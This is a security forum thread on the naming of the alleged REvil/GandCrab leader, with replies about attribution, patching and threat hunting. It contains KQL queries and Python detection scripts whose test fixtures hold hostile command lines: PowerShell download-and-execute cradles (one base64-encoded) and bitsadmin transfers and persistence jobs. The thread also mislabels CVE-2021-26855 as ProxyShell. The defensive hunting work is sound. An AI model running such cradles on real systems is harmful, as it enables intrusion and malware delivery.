
GandCrab/REvil 'UNKN' Doxed: Shchukin Named by German Authorities

TabletopEx_Quinn 4/14/2026 USER

Huge development regarding threat attribution this morning. German authorities have named Daniil Maksimovich Shchukin (31) as the elusive "UNKN," the alleged mastermind behind GandCrab and REvil. While this is primarily an intelligence win, it reminds us of the massive footprint these groups left behind.

Shchukin is linked to over 130 acts of sabotage. Technically, these gangs were pioneers of the RaaS model and heavily relied on exploiting on-premise vulnerabilities to gain initial access. We're talking about classics like CVE-2021-26855 (ProxyShell) and CVE-2021-34527 (PrintNightmare).

Since REvil operations were highly manual for lateral movement, hunting for the specific TTPs they popularized remains relevant. Affiliates often used PowerShell for discovery and exfiltration. If you are auditing your environment for remnants or similar successor behaviors, keep an eye on BITSAdmin or specific PowerShell encoded commands.

Here is a KQL snippet for hunting suspicious PowerShell download patterns often associated with these loader scripts:

DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName =~ "powershell.exe"
| where ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "IEX"
| where ProcessCommandLine matches regex @"http[s]?://[^\s]+\.ps1"
| project DeviceName, AccountName, FolderPath, ProcessCommandLine

Given that the RaaS code is likely already in the wild among former affiliates, does identifying the leadership actually disrupt current operations, or is this just a retrospective win for law enforcement?
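The KQL above only sees download strings that appear in clear text on the command line. The following is an added example, not code from the original post: it applies the same IEX/DownloadString-plus-.ps1-URL logic over constructed DeviceProcessEvents-style records in Python, and additionally decodes -EncodedCommand arguments (base64 over UTF-16LE), which is where the encoded PowerShell mentioned in the post hides. Host names, account names, addresses and the FileName column check are assumptions for the example.

```python
"""Hunt PowerShell process events for remote .ps1 download patterns.

Added example for the thread, not code from the original post. It mirrors the
KQL above (IEX/DownloadString plus a .ps1 URL) and extends it by decoding
-EncodedCommand payloads, which a plain substring match on the command line
misses. Event records and addresses are constructed test fixtures.
"""
import base64
import binascii
import re

# Same idea as the post's KQL regex, stopping at quotes as well as whitespace.
URL_PS1 = re.compile(r"https?://[^\s\"']+\.ps1", re.IGNORECASE)
DOWNLOAD_MARKERS = ("downloadstring", "iex")
# PowerShell accepts unambiguous prefixes of -EncodedCommand; these are the common spellings.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\b\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE), or None."""
    match = ENCODED_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def inspect_event(event):
    """Apply the hunt to one DeviceProcessEvents-style record; return a finding or None."""
    if event["FileName"].lower() != "powershell.exe":
        return None
    # Check the raw command line first, then the decoded payload if one is present.
    candidates = [("plaintext", event["ProcessCommandLine"])]
    decoded = decode_encoded_command(event["ProcessCommandLine"])
    if decoded is not None:
        candidates.append(("encoded", decoded))
    for source, text in candidates:
        url = URL_PS1.search(text)
        lowered = text.lower()
        if url and any(marker in lowered for marker in DOWNLOAD_MARKERS):
            return {
                "DeviceName": event["DeviceName"],
                "AccountName": event["AccountName"],
                "Source": source,
                "Url": url.group(0),
            }
    return None


def hunt(events):
    """Run inspect_event over a batch and keep the hits, in input order."""
    return [finding for finding in map(inspect_event, events) if finding]


def encode_for_powershell(script):
    """Build a -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (documentation-range IPs, hypothetical hosts and users).
SAMPLE_EVENTS = [
    {"DeviceName": "WKSTN-01", "AccountName": "jdoe", "FileName": "powershell.exe",
     "ProcessCommandLine": 'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient)'
                           ".DownloadString('http://203.0.113.10/stage.ps1')\""},
    {"DeviceName": "WKSTN-02", "AccountName": "asmith", "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell.exe -nop -w hidden -EncodedCommand " + encode_for_powershell(
         "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/loader.ps1')")},
    {"DeviceName": "WKSTN-03", "AccountName": "admin", "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell.exe -Command Get-ChildItem C:\\Users"},
    {"DeviceName": "WKSTN-04", "AccountName": "build", "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell.exe -Command Invoke-WebRequest https://intranet.example/report.ps1 -OutFile r.ps1"},
    {"DeviceName": "WKSTN-05", "AccountName": "jdoe", "FileName": "cmd.exe",
     "ProcessCommandLine": "cmd.exe /c echo IEX http://203.0.113.10/x.ps1"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

WKSTN-01 is caught by the plain-text rule, WKSTN-02 only after decoding, and WKSTN-04 is deliberately left alone because a .ps1 URL without IEX/DownloadString does not meet the post's rule; tune DOWNLOAD_MARKERS if your environment sees other cradle verbs.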

BugBounty_Leo 4/14/2026

It’s definitely a retrospective win for intel, but the operational disruption is minimal. The 'brand' of REvil fractured months ago. We still see distinct variants of the Sodinokibi encryptor in the wild—likely from affiliates who kept the builders. I'd recommend checking for unsigned binaries dropping in C:\Windows\Temp as well, since that was a common staging ground for their droppers post-initial access.

DNS_Security_Rita 4/14/2026

From an MSP perspective, the biggest takeaway is the lifecycle of these exploits. We're still cleaning up ProxyShell and SonicWall vulnerabilities that these groups exploited years ago. Attribution is great for the news cycle, but for us, it just reinforces that patch hygiene is the only real defense against these legacy RaaS operations.

whatahey 4/14/2026

I dug into the indictment details—shoddy OPSEC was his undoing. Using personal email for recovery and linking online identities is a rookie mistake for someone of that caliber. Technically, the malware was sophisticated, but the tradecraft on the identity side failed. We often focus too much on the binary analysis and not enough on the identity correlation of the threat actors.

EDR_Engineer_Raj 4/15/2026

While attribution helps close the legal chapter, the source code leaks mean the TTPs live on. As EDR engineers, we’re still seeing loaders leveraging BITSAdmin for persistence in newer variants. I recommend hunting for these specific process chains rather than just hashing old binaries. You can use this KQL query to check for suspicious BITS activity on your endpoints:

// Advanced Hunting: DeviceProcessEvents exposes the command line as ProcessCommandLine, not CommandLine
DeviceProcessEvents
| where FileName =~ "bitsadmin.exe"
| where ProcessCommandLine contains "/transfer" or ProcessCommandLine contains "download"
| project Timestamp, DeviceName, InitiatingProcessFileName, ProcessCommandLine
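As an added example, not code from this post, the Python below takes the same bitsadmin.exe hunt and makes it process-chain aware: it tokenises the command line so "/transfer" and "/download" are matched as switches rather than as text anywhere in the line, flags the job-notification switch that BITS persistence relies on, checks for paths under C:\Windows\Temp (the staging directory BugBounty_Leo mentions above), and scores the parent process. The list of unusual parents, the host names and the addresses are assumptions for the example.

```python
r"""Hunt bitsadmin.exe process events by parsed switches and process chain.

Added example for the thread, not code from the original post. Events are
constructed fixtures shaped like DeviceProcessEvents rows.
"""
import re

TOKEN = re.compile(r'"[^"]*"|\S+')          # quoted argument or bare word
URL = re.compile(r"https?://\S+", re.IGNORECASE)
TRANSFER_SWITCHES = {"/transfer", "/download", "/addfile"}
TEMP_STAGING = "c:\\windows\\temp\\"
# Parents that rarely launch the BITS client legitimately (assumption for this example).
UNUSUAL_PARENTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                   "winword.exe", "excel.exe"}


def parse_bitsadmin(cmdline):
    """Split a bitsadmin command line into (switches, urls, all_tokens)."""
    tokens = [t.strip('"') for t in TOKEN.findall(cmdline)]
    switches = {t.lower() for t in tokens if t.startswith("/")}
    urls = [t for t in tokens if URL.fullmatch(t)]
    return switches, urls, tokens


def inspect_event(event):
    """Return a finding for a bitsadmin.exe event that trips any heuristic, else None."""
    if event["FileName"].lower() != "bitsadmin.exe":
        return None
    switches, urls, tokens = parse_bitsadmin(event["ProcessCommandLine"])
    reasons = []
    if switches & TRANSFER_SWITCHES:
        reasons.append("remote transfer requested")
    if "/setnotifycmdline" in switches:
        reasons.append("job notification command set (possible persistence)")
    if any(t.lower().startswith(TEMP_STAGING) for t in tokens):
        reasons.append("references C:\\Windows\\Temp")
    parent = event["InitiatingProcessFileName"].lower()
    if parent in UNUSUAL_PARENTS:
        reasons.append(f"unusual parent {parent}")
    if not reasons:
        return None
    return {
        "DeviceName": event["DeviceName"],
        "Parent": parent,
        "Urls": urls,
        "Reasons": reasons,
        "Severity": "high" if len(reasons) >= 2 else "medium",
    }


def hunt(events):
    """Run inspect_event over a batch and keep the hits, in input order."""
    return [f for f in map(inspect_event, events) if f]


# Constructed sample events (documentation-range IP, hypothetical hosts).
SAMPLE_EVENTS = [
    {"DeviceName": "SRV-01", "FileName": "bitsadmin.exe", "InitiatingProcessFileName": "cmd.exe",
     "ProcessCommandLine": "bitsadmin /transfer updatejob /download /priority normal "
                           "http://203.0.113.10/payload.dat C:\\Windows\\Temp\\p.dat"},
    {"DeviceName": "WKSTN-07", "FileName": "bitsadmin.exe", "InitiatingProcessFileName": "powershell.exe",
     "ProcessCommandLine": "bitsadmin /SetNotifyCmdLine job1 C:\\Windows\\Temp\\run.exe NULL"},
    {"DeviceName": "SRV-02", "FileName": "bitsadmin.exe", "InitiatingProcessFileName": "cmd.exe",
     "ProcessCommandLine": "bitsadmin /list /allusers"},
    {"DeviceName": "SRV-02", "FileName": "svchost.exe", "InitiatingProcessFileName": "services.exe",
     "ProcessCommandLine": "svchost.exe -k netsvcs -p -s BITS"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

The benign "/list /allusers" call and the BITS service host itself produce nothing, while the transfer into C:\Windows\Temp and the notification-command job launched from PowerShell both score as high; pair the findings with the source hashes from your EDR rather than relying on either signal alone.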


Thread Stats

Created 4/14/2026
Last Active 4/15/2026
Replies 4
Views 63